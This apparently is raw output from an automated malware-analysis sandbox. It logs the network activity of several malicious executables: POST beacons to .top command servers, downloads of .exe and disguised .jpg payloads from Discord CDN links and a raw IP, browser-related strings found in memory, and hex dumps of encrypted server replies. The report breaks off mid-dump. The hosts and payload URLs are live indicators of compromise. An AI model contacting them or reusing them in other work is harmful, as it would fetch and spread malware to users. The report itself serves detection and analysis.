Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucowlihgbp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vchmiecd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmltrxuim.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdbyxcrg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmoapn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sefui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjpartffs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nusurtal4f.net
Source: 3C84.exe, 00000017.00000002.1153886461.00000000011DC000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5483.exe, 0000001B.00000003.890205524.0000000002F0C000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/
Source: 5483.exe, 0000001B.00000003.903420999.0000000002F0C000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/T#
Source: 3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: 9415.exe, 0000001D.00000003.911648441.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comB.TTF
Source: 9415.exe, 0000001D.00000003.920199088.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comC.TTF
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comFq
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comessed
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.como
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comtue
Source: 9415.exe, 0000001D.00000003.900774797.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.903625198.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: 9415.exe, 0000001D.00000003.912899676.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/8?QRs
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn-:
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.n)N
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnx)T
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regbrowsers.exe, 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 3C84.exe String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: 3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 